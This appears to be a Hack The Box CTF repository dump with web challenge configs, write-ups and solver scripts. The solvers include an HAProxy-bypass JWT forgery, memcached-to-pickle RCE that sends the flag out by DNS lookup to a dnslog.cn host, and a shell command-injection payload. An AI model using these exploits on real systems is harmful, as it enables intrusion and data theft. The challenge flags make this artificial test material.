48 | #
-------------------------------------------------------------------------------- /web/[Insane] apexsurvive/htb/test.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/htb/test.jpeg -------------------------------------------------------------------------------- /web/[Medium] LockTalk/assets/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Medium] LockTalk/assets/.gitkeep -------------------------------------------------------------------------------- /web/[Medium] LockTalk/conf/haproxy.cfg: -------------------------------------------------------------------------------- 1 | global 2 | daemon 3 | maxconn 256 4 | 5 | defaults 6 | mode http 7 | 8 | timeout connect 5000ms 9 | timeout client 50000ms 10 | timeout server 50000ms 11 | 12 | frontend haproxy 13 | bind 0.0.0.0:1337 14 | default_backend backend 15 | 16 | http-request deny if { path_beg,url_dec -i /api/v1/get_ticket } # NOTE(review): this deny rule at the proxy is the only control on /api/v1/get_ticket visible here; the application should check access itself rather than depend on the proxy and the backend normalising request paths the same way 17 | 18 | backend backend 19 | balance roundrobin 20 | server s1 0.0.0.0:5000 maxconn 32 check 21 | -------------------------------------------------------------------------------- /web/[Medium] LockTalk/conf/requirements.txt: -------------------------------------------------------------------------------- 1 | uwsgi 2 | Flask 3 | requests 4 | python_jwt==3.3.3 # NOTE(review): solver.py in this challenge alters the role claim of an issued token and still gets it accepted, presumably by this pinned library; move to a later release after checking its advisories, and pin the three packages above too -------------------------------------------------------------------------------- /web/[Medium] LockTalk/conf/supervisord.conf: -------------------------------------------------------------------------------- 1 | [supervisord] 2 | nodaemon=true 3 | logfile=/dev/null 4 | logfile_maxbytes=0 5 | pidfile=/run/supervisord.pids 6 | user=root 7 | 8 | [program:uwsgi] 9 | command=uwsgi --ini '/opt/conf/uwsgi.ini' 10 |
stdout_logfile=/dev/stdout 11 | stdout_logfile_maxbytes=0 12 | stderr_logfile=/dev/stderr 13 | stderr_logfile_maxbytes=0 14 | 15 | [program:haproxy] 16 | command=haproxy -db -f '/opt/conf/haproxy.cfg' 17 | stdout_logfile=/dev/stdout 18 | stdout_logfile_maxbytes=0 19 | stderr_logfile=/dev/stderr 20 | stderr_logfile_maxbytes=0 -------------------------------------------------------------------------------- /web/[Medium] LockTalk/conf/uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | ; application settings 3 | workdir = /opt/app/ 4 | ipaddress = 0.0.0.0 5 | port = 5000 6 | virtualenv = /venv 7 | 8 | ; application configuration 9 | chdir = %(workdir) 10 | http-socket = %(ipaddress):%(port) 11 | protocol = http 12 | master = true 13 | processes = 2 14 | http-timeout = 86400 15 | single-interpreter = true 16 | enable-threads = true 17 | thunder-lock = true 18 | vacuum = true 19 | disable-logging = true 20 | 21 | ; application module 22 | module = run:app 23 | 24 | ; internal routes 25 | route = .* addheader:Server: uWSGI Server 26 | 27 | ; setup uid, gid 28 | uid = nobody 29 | gid = nobody -------------------------------------------------------------------------------- /web/[Medium] LockTalk/htb/solver.py: -------------------------------------------------------------------------------- 1 | from jwcrypto.common import base64url_encode, base64url_decode 2 | from json import loads, dumps 3 | import requests 4 | import socket 5 | 6 | def send_raw_http_request(host, port, request): 7 | client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | 9 | client_socket.connect((host, port)) 10 | 11 | client_socket.sendall(request.encode()) 12 | 13 | response = b"" 14 | while True: 15 | recv_data = client_socket.recv(1024) 16 | if not recv_data: 17 | break 18 | response += recv_data 19 | 20 | client_socket.close() 21 | 22 | return response.decode() 23 | 24 | def get_token(host,port): 25 | request = f"""GET 
/api/v1/get_ticket# HTTP/1.1\r\nHost: {host}:{port}\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36\r\nConnection: close\r\n\r\n""" 26 | 27 | response = send_raw_http_request(host, 1337, request) 28 | json_start = response.find("{") 29 | json_end = response.rfind("}") + 1 30 | json_data = response[json_start:json_end] 31 | 32 | ticket_dict = loads(json_data) 33 | token = ticket_dict.get("ticket: ") 34 | 35 | return token 36 | 37 | def exp(token): 38 | [header, payload, signature] = token.split(".") 39 | parsed_payload = loads(base64url_decode(payload)) 40 | parsed_payload["role"] = "administrator" 41 | fake_payload = base64url_encode((dumps(parsed_payload, separators=(',',':')))) 42 | 43 | return '{" ' + header + '.'+ fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}' 44 | 45 | def get_flag(host,port,token): 46 | 47 | headers = {"Authorization": token} 48 | req = requests.get(f"http://{host}:{port}/api/v1/flag", headers=headers) 49 | 50 | return req 51 | 52 | host = "localhost" 53 | port = 1337 54 | 55 | guest_token = get_token(host, port) 56 | admin_token = exp(guest_token) 57 | flag = get_flag(host, port, admin_token) 58 | 59 | print(flag.text) -------------------------------------------------------------------------------- /web/[Medium] SerialFlow/assets/overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Medium] SerialFlow/assets/overview.png -------------------------------------------------------------------------------- /web/[Medium] SerialFlow/assets/purple.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Medium] 
SerialFlow/assets/purple.png -------------------------------------------------------------------------------- /web/[Medium] SerialFlow/conf/supervisord.conf: -------------------------------------------------------------------------------- 1 | [supervisord] 2 | user=root 3 | nodaemon=true 4 | logfile=/dev/null 5 | logfile_maxbytes=0 6 | pidfile=/run/supervisord.pid 7 | 8 | [program:flask] 9 | command=python /app/run.py 10 | user=root 11 | autorestart=true 12 | stdout_logfile=/dev/stdout 13 | stdout_logfile_maxbytes=0 14 | stderr_logfile=/dev/stderr 15 | stderr_logfile_maxbytes=0 16 | 17 | [program:memcached] 18 | command=memcached -u memcache -m 64 19 | user=memcached 20 | autorestart=true 21 | stdout_logfile=/dev/stdout 22 | stdout_logfile_maxbytes=0 23 | stderr_logfile=/dev/stderr 24 | stderr_logfile_maxbytes=0 -------------------------------------------------------------------------------- /web/[Medium] SerialFlow/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Secure entrypoint 4 | chmod 600 /entrypoint.sh 5 | 6 | # Change flag name 7 | mv /flag.txt /flag$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 10).txt 8 | 9 | /usr/bin/supervisord -c /etc/supervisord.conf -------------------------------------------------------------------------------- /web/[Medium] SerialFlow/htb/solver.py: -------------------------------------------------------------------------------- 1 | import pickle, os, requests, time 2 | 3 | HOST, PORT = "94.237.53.58", 53780 4 | CHALLENGE_URL = f"http://{HOST}:{PORT}" 5 | DNS_EXFIL = "476bdo.dnslog.cn" 6 | 7 | class RCE: 8 | def __init__(self, char): 9 | self.char = char 10 | 11 | def __reduce__(self): 12 | cmd = (f"echo -n '{self.char}'>>a") 13 | 14 | return os.system, (cmd,) 15 | 16 | 17 | class TriggerRCE: 18 | def __reduce__(self): 19 | cmd = (f"sh a") 20 | return os.system, (cmd,) 21 | 22 | 23 | def generate_rce(char, trigger=False): 24 | payload = pickle.dumps(RCE(char), 
0) 25 | if trigger: payload = pickle.dumps(TriggerRCE(), 0) 26 | payload_size = len(payload) 27 | cookie = b"1\r\nset injected 0 5 " 28 | cookie += str.encode(str(payload_size)) 29 | cookie += str.encode("\r\n") 30 | cookie += payload 31 | cookie += str.encode("\r\n") 32 | cookie += str.encode("get injected") 33 | 34 | pack = "" 35 | for x in list(cookie): 36 | if x > 64: 37 | pack += oct(x).replace("0o", "\\") 38 | elif x < 8: 39 | pack += oct(x).replace("0o", "\\00") 40 | else: 41 | pack += oct(x).replace("0o", "\\0") 42 | 43 | return f"\"{pack}\"" 44 | 45 | 46 | def generate_exploit(cmd): 47 | cmd = " ".join(cmd) + " " 48 | payload_list = [] 49 | for char in cmd: 50 | if char == "\n": 51 | payload_list.append(generate_rce(char, newline=True)) 52 | else: 53 | payload_list.append(generate_rce(char)) 54 | 55 | return payload_list 56 | 57 | 58 | def pwn(): 59 | payload_file = f"nslookup $(cat /flag*).{DNS_EXFIL}" 60 | exploit = generate_exploit(payload_file) 61 | for char_payload in exploit: 62 | while True: 63 | time.sleep(1) 64 | try: 65 | resp = requests.get(f"{CHALLENGE_URL}/set", cookies={"session": char_payload}) 66 | if resp.status_code != 500 or resp.status_code != 200: 67 | break 68 | else: 69 | requests.get(f"{CHALLENGE_URL}/") 70 | continue 71 | except: 72 | continue 73 | 74 | trigger = generate_rce("", trigger=True) 75 | while True: 76 | time.sleep(1) 77 | try: 78 | resp = requests.get(f"{CHALLENGE_URL}/set", cookies={"session": trigger}) 79 | if resp.status_code != 302 or resp.status_code != 200: 80 | break 81 | else: 82 | requests.get(f"{CHALLENGE_URL}/") 83 | continue 84 | except: 85 | continue 86 | 87 | 88 | def main(): 89 | pwn() 90 | 91 | 92 | if __name__ == "__main__": 93 | main() -------------------------------------------------------------------------------- /web/[Very Easy] Flag Command/assets/dev.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] Flag Command/assets/dev.png -------------------------------------------------------------------------------- /web/[Very Easy] Flag Command/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] Flag Command/assets/flag.png -------------------------------------------------------------------------------- /web/[Very Easy] Flag Command/assets/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] Flag Command/assets/home.png -------------------------------------------------------------------------------- /web/[Very Easy] Flag Command/assets/res.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] Flag Command/assets/res.png -------------------------------------------------------------------------------- /web/[Very Easy] Flag Command/htb/solver.py: -------------------------------------------------------------------------------- 1 | import requests, re, sys, datetime, hashlib 2 | 3 | hostURL = f'http://127.0.0.1:1337' 4 | 5 | session = requests.session() 6 | 7 | def getFlag(): 8 | jData = { 9 | 'command': 'Blip-blop, in a pickle with a hiccup! 
Shmiggity-shmack' 10 | } 11 | 12 | req_stat = session.post(f'{hostURL}/api/monitor', json=jData) 13 | flag = re.findall(r'(HTB\{.*?\})', req_stat.text) 14 | print(f'[*] Flag: {flag[0]}') 15 | 16 | print('[*] Gettingg Flag') 17 | getFlag() -------------------------------------------------------------------------------- /web/[Very Easy] Flag Command/official_writeup.md: -------------------------------------------------------------------------------- 1 | ![](https://raw.githubusercontent.com/hackthebox/writeup-templates/master/challenge/assets/images/banner.png) 2 | 3 | 4 | 5 | Flag Command 6 | 7 | Prepared By: Xclow3n 8 | 9 | Challenge Author(s): Xclow3n 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | 16 | ### Description: 17 | 18 | Embark on the "Dimensional Escape Quest" where you wake up in a mysterious forest maze that's not quite of this world. Navigate singing squirrels, mischievous nymphs, and grumpy wizards in a whimsical labyrinth that may lead to otherworldly surprises. Will you conquer the enchanted maze or find yourself lost in a different dimension of magical challenges? The journey unfolds in this mystical escape! 19 | 20 | ### Objective 21 | 22 | Find a secret command in the JSON response and use it to get the flag. 23 | 24 | ## Application Overview 25 | 26 | Visiting the home page, we are presented with the following page: 27 | 28 | ![img](assets/home.png) 29 | 30 | We can play the game, but none of the options leads us to the flag. 31 | 32 | ## Solution 33 | 34 | If we open the Network tab of the browser's developer tools and reload the page, we can see that it makes a web request to the `options` endpoint. 35 | 36 | ![img](assets/dev.png) 37 | 38 | Looking at the response of this endpoint, we find a secret command whose value is "Blip-blop, in a pickle with a hiccup! Shmiggity-shmack". Because the server returns this value to every client, it is effectively public: anything delivered to the browser can be read there. 39 | 40 | ![img](assets/res.png) 41 | 42 | If we start the game and enter the secret value, we get the flag. 
43 | 44 | ![img](assets/flag.png) -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] KORP Terminal/.gitignore -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/assets/dump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] KORP Terminal/assets/dump.png -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/assets/overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] KORP Terminal/assets/overview.png -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/assets/sqlmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] KORP Terminal/assets/sqlmap.png -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/conf/supervisord.conf: -------------------------------------------------------------------------------- 1 | [supervisord] 2 | user=root 3 | nodaemon=true 4 | logfile=/dev/null 5 | logfile_maxbytes=0 6 | pidfile=/run/supervisord.pid 7 | 8 | [program:flask] 9 | command=python /app/run.py 10 | user=root 11 | autorestart=true 12 | stdout_logfile=/dev/stdout 13 | stdout_logfile_maxbytes=0 14 | 
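stderr_logfile=/dev/stderr 15 | stderr_logfile_maxbytes=0 -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/entrypoint.sh: --------------------------------------------------------------------------------
#!/bin/sh
# Entrypoint for the KORP Terminal challenge container: generates a database
# password, starts MariaDB, seeds the `users` table, then starts supervisord.

# Secure entrypoint: restrict this script to its owner.
chmod 600 /entrypoint.sh

# Random password function.
# Prints 32 lowercase hex characters read from /dev/urandom. Deliberately not
# `echo -n $RANDOM | md5sum`: $RANDOM has at most 32768 values, so that form
# can only ever produce 32768 passwords, and in a shell without $RANDOM it
# produces a single constant. Defined in POSIX form (no `function` keyword)
# to match the #!/bin/sh shebang.
genPass() {
    tr -dc 'a-f0-9' < /dev/urandom | head -c 32
}

# Set environment variables
export MYSQL_HOST="localhost"
export MYSQL_DATABASE="korp_terminal"
export MYSQL_USER="lean"
export MYSQL_PASSWORD="$(genPass)"

# Initialize & Start MariaDB
mkdir -p /run/mysqld
chown -R mysql:mysql /run/mysqld
mysql_install_db --user=mysql --ldata=/var/lib/mysql
# NOTE(review): --skip-networking=0 leaves the TCP listener enabled, and root
# is used below without a password. This looks safe only while the database
# port is not reachable from outside the container; confirm.
mysqld --user=mysql --console --skip-networking=0 &

# Wait for mysql to start
while ! mysqladmin ping -h"localhost" --silent; do echo "not up" && sleep .2; done

# Populate database.
# The heredoc is unquoted so the ${MYSQL_*} variables expand; the \$ escapes
# keep the `$` characters of the stored bcrypt hash literal. The application
# account is granted SELECT on the users table only.
mysql -u root << EOF
DROP DATABASE IF EXISTS ${MYSQL_DATABASE};
CREATE DATABASE ${MYSQL_DATABASE};
CREATE TABLE ${MYSQL_DATABASE}.users (
    id INTEGER PRIMARY KEY AUTO_INCREMENT,
    username varchar(255) NOT NULL UNIQUE,
    password varchar(255) NOT NULL
);

INSERT INTO ${MYSQL_DATABASE}.users(username, password) VALUES('admin', '\$2b\$12\$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.');

CREATE USER '${MYSQL_USER}'@'${MYSQL_HOST}' IDENTIFIED BY '${MYSQL_PASSWORD}';
GRANT SELECT ON ${MYSQL_DATABASE}.users TO '${MYSQL_USER}'@'${MYSQL_HOST}';

FLUSH PRIVILEGES;
EOF

/usr/bin/supervisord -c /etc/supervisord.conf
-------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/htb/solver.py: --------------------------------------------------------------------------------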
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] KORP Terminal/htb/solver.py -------------------------------------------------------------------------------- /web/[Very Easy] TimeKORP/README.md: -------------------------------------------------------------------------------- 1 | # TimeKORP 2 | 3 | ### Description: 4 | * Are you ready to unravel the mysteries and expose the truth hidden within Korp's digital domain? Join the challenge and prove your prowess in the world of cybersecurity. Remember, time is money, but in this case, the rewards may be far greater than you imagine. 5 | 6 | ### Objective: 7 | * Command Injection 8 | 9 | ### Difficulty: 10 | * `Very Easy` 11 | 12 | ### Flag: 13 | * `HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}` 14 | 15 | ### Challenge: 16 | 17 |

18 | 19 |

20 | 21 | # [__⏰ Time Factory__](#time-factory) 22 | 23 | In [`controllers/TimeController.php`](challenge/controllers/TimeController.php), we see that the application expects input through `$_GET`'s `format` value. If there isn't one, it defaults to `'%H:%M:%S'`; the value is then passed to `TimeModel`, and the result of the `getTime()` method is handed to the view. 24 | ```php 25 | view('index', ['time' => $time->getTime()]); 33 | } 34 | } 35 | ``` 36 | 37 | In [`models/TimeModel.php`](challenge/models/), the argument is then used to build a variable called `command`, which is later passed to `exec`. Using the `format` GET parameter, we can escape the context of the `date` command and utilise command injection in order to get RCE. The root cause is that `$format` is concatenated into the shell string without escaping or validation; the defensive fix is to format the time without invoking a shell at all, or at minimum to pass the value through `escapeshellarg()` and restrict it to an allowlist of format characters. 38 | 39 | ```php 40 | command = "date '+" . $format . "' 2>&1"; 46 | } 47 | 48 | public function getTime() 49 | { 50 | $time = exec($this->command); 51 | $res = isset($time) ? $time : '?'; 52 | return $res; 53 | } 54 | } 55 | ``` 56 | 57 | ### Solver: 58 | ```python 59 | import requests 60 | 61 | host, port = 'localhost', 1337 62 | HOST = 'http://%s:%s/' % (host, port) 63 | 64 | r = requests.get(HOST, params={ 'format': "'; cat /flag || '" }) 65 | print(r.text) 66 | ``` 67 | -------------------------------------------------------------------------------- /web/[Very Easy] TimeKORP/assets/preview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] TimeKORP/assets/preview.png -------------------------------------------------------------------------------- /web/[Very Easy] TimeKORP/flag: -------------------------------------------------------------------------------- 1 | HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3} -------------------------------------------------------------------------------- /web/[Very Easy] TimeKORP/htb/solver.py: 
--------------------------------------------------------------------------------
import requests

# Solver for the TimeKORP challenge, pointed at a local instance of the lab.
# It issues a single GET request whose `format` query parameter carries the
# value shown below, then prints the response body.
host, port = 'localhost', 1337
HOST = f'http://{host}:{port}/'

# The parameter value is kept in its own dict so the request line stays short.
query = {'format': "'; cat /flag || '"}
response = requests.get(HOST, params=query)
print(response.text)
--------------------------------------------------------------------------------